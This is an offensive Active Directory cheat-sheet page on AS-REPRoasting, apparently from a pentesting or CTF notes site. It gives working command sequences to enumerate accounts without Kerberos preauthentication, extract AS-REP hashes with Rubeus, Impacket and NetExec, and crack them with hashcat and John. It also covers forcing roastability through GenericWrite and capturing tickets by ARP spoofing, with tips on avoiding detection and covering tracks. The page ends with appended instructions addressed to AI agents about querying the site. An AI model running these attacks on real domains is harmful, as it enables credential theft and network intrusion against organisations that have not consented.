# AS-REPRoasting

## Overview

{% hint style="info" %}

* [How to Hack Active Directory with ASREP Roasting](https://www.youtube.com/watch?v=wA9w8t1fRWo)
* [Attacking Active Directory - AS-REP Roasting](https://www.youtube.com/watch?v=EVdwnBFtUtQ)
  {% endhint %}

{% hint style="success" %}
This attack can prove useful for:

* Persistence → allows to potentially regain access in the future.
* Privilege Esclation → we can compromise a user without knowing or resetting their password.
  {% endhint %}

AS-REPRoasting is an attack on the initial Kerberos authentication step and it is typically performed after obtaining a list of valid domain users.

Preauthentication is a security feature in Kerberos where the client must prove knowledge of their password before the KDC issues a TGT. This is done by encrypting a timestamp with a key derived from the user’s password and sending it to the KDC. If the KDC can decrypt and validate the timestamp, it confirms the user knows their password, protecting against offline brute-force attacks.

If an account has the [`Do not require Kerberos pre-authentication`](https://www.tenable.com/blog/how-to-stop-the-kerberos-pre-authentication-attack-in-active-directory) option enabled, then any unauthenticated client with network access to the KDC can request to authenticate as that account and receive an AS-REP. The AS‑REP contains the TGT and the user-KDC session key. The latter is encrypted with data derived from the account’s password hash, making it possible for an attacker to perform offline cracking to recover the credential.

{% code overflow="wrap" %}

```
         AS-REP (Response from KDC)
+--------------------------------------------+             
|	+----------------------------------------+ |
|	|  1. Ticket Granting Ticket (TGT)       | |
|	|     +-------------------------------+  | |
|	|     | User information +            |  | |
|	|     | User-KDC session key          |  | |        
|	|     +-------------------------------+  | |
|	+----------------------------------------+ |
|	      Encrypted with KDC's secret key      |
|	                                           |
|	+--------------------------------------+   |
|	|  2. User / KDC session key           |   |
|	|     (Same session key as in the TGT) |   |  -------> AS-REPRoast
|	+--------------------------------------+   |          
|	      Encrypted with the user's secret     |
+--------------------------------------------+  
```

{% endcode %}

## Tools <a href="#windows" id="windows"></a>

{% hint style="warning" %}
**OPSEC**: Try to attack a single user at a time, as it won't be seen as an anomaly and won't trigger alerts.
{% endhint %}

### Windows

{% code overflow="wrap" %}

```powershell
###########################################
# Enumeration of AS-REPRoastable accounts #
###########################################

# PowerView
Get-DomainUser -UACFilter DONT_REQ_PREAUTH

Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl

# PowerShell's Active Directory module
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth

 # Rubeus
.\Rubeus.exe preauthscan /users:users.txt /domain:batman.local /dc:10.10.71.220
.\Rubeus.exe asreproast /format:hashcat

####################
# Attack execution #
####################

# All susceptible accounts
.\Rubeus.exe asreproast /nowrap /format:hashcat /outfile:<fileName>

# A single account
.\Rubeus.exe asreproast /user:target.user /domain:batman.local /nowrap /format:hashcat /outfile:hashes.txt

#################
# Hash cracking #
#################

# Hashcat
hashcat -m 18200 asreproast.lst /usr/share/wordlists/rockyou

# John
john --format=krb5asrep --wordlist=rockyou.txt --fork=4 asreproast.lst
```

{% endcode %}

### Linux

{% hint style="warning" %}
When attacking from Linux, use the target’s DNS server or configure `/etc/hosts` for the targets, domain, and DC.
{% endhint %}

{% hint style="info" %}

* [GetNPUsers & Kerberos Pre-Auth Explained](https://www.youtube.com/watch?v=pZSyGRjHNO4)
* For an example of AS-REPRoasting using `nxc`, see [Sauna](https://x7331.gitbook.io/boxes/boxes/easy/sauna#asreproasting).
  {% endhint %}

{% code overflow="wrap" %}

```shell
###########################################
# Enumeration of AS-REPRoastable accounts #
###########################################

# Impacket
impacket-GetNPUsers batman.local/x7331 -dc-ip 10.10.71.220 -dc-host srv01.batman.local

impacket-GetNPUsers BATMAN/ -dc-ip 10.10.71.220 -usersfile users.txt -format hashcat -outputfile hashes.txt -no-pass

# Kerbrute
kerbrute userenum -d batman.local --dc 10.10.71.220 /opt/jsmith.txt

####################
# Attack execution #
####################

# Impacket - all accounts
impacket-GetNPUsers batman.local/x7331 -request
impacket-GetNPUsers BATMAN/ -dc-ip 10.10.71.220 -no-pass -usersfile users.txt

# Impacket - single account
impacket-GetNPUsers batman.local/asreproastable-user -dc-ip 10.10.71.220 -no-pass

# NetExec
nxc ldap 10.10.71.220 -u users.txt -p '' --asreproast asreproast.lst

#################
# Hash cracking #
#################

# Hashcat
hashcat -m 18200 asreproast.lst /usr/share/wordlists/rockyou

# John
john --format=krb5asrep --wordlist=rockyou.txt --fork=4 asreproast.lst
```

{% endcode %}

## Targeted AS-REPRoast

If we can't find any vulnerable user, but we have `GenericWrite` or `GenericAll` on a user object, we can modify that user's `UserAccountControl` to disable preauthentication and then perform the ASREP roast attack.

{% hint style="warning" %}
**OPSEC**:  Don't forget to reset the `UserAccountControl` after extraction.
{% endhint %}

{% code overflow="wrap" %}

```powershell
# Disable preauthentication with PowerView
Set-DomainObject -Identity <user> -XOR @{useraccountcontrol=4194304} -Verbose

# Request AS-REP with Rubeus
.\Rubeus.exe asreproast /user:<user> /outfile:<fileName> /nowrap /format:hashcat
```

{% endcode %}

## AS-REP via ARP-Spoofing

When a user logs into a domain-joined workstation, Kerberos authentication is automatically initiated. The client sends an AS-REQ to the DC, which responds with an AS-REP containing a TGT. This ticket is encrypted using a key derived from the user’s password. If weak encryption such as [RC4](https://learn.microsoft.com/en-us/windows-server/security/kerberos/detect-remediate-rc4-kerberos) is used, the encrypted portion can be extracted and attacked offline to recover the password.

On local networks, systems use the Address Resolution Protocol (ARP) to map IP addresses to MAC addresses. Because **ARP lacks authentication**, an attacker on the same VLAN can send forged ARP responses to impersonate the DC and/or the client. This redirects traffic through the attacker while communication continues normally, creating a **Man-in-the-Middle** attack position.

From this position, Kerberos traffic (TCP/88) can be intercepted. The attacker captures the AS-REQ, relays it to the DC, and then captures the AS-REP response. The encrypted ticket data is extracted and formatted for offline password cracking.

This can be performed using the [ASRepCatcher](https://github.com/Yaxxine7/ASRepCatcher) tool, which supports two modes:

* In **relay mode (recommended)**, AS-REQ messages are intercepted and forwarded to the DC. If RC4 is supported, the tool attempts to force its use to simplify cracking, while ARP spoofing ensures authentication traffic passes through the attacker.&#x20;
* In **listen mode**, the gateway’s ARP cache is poisoned to passively capture AS-REP responses without modifying traffic, making it less intrusive but also less effective in weakening encryption.

```bash
# Relay mode
ASRepCatcher relay -dc 192.168.1.100

# Listen mode
ASRepCatcher listen
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://x7331.gitbook.io/boxes/tl-dr/active-directory/attacks/as-reproasting.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.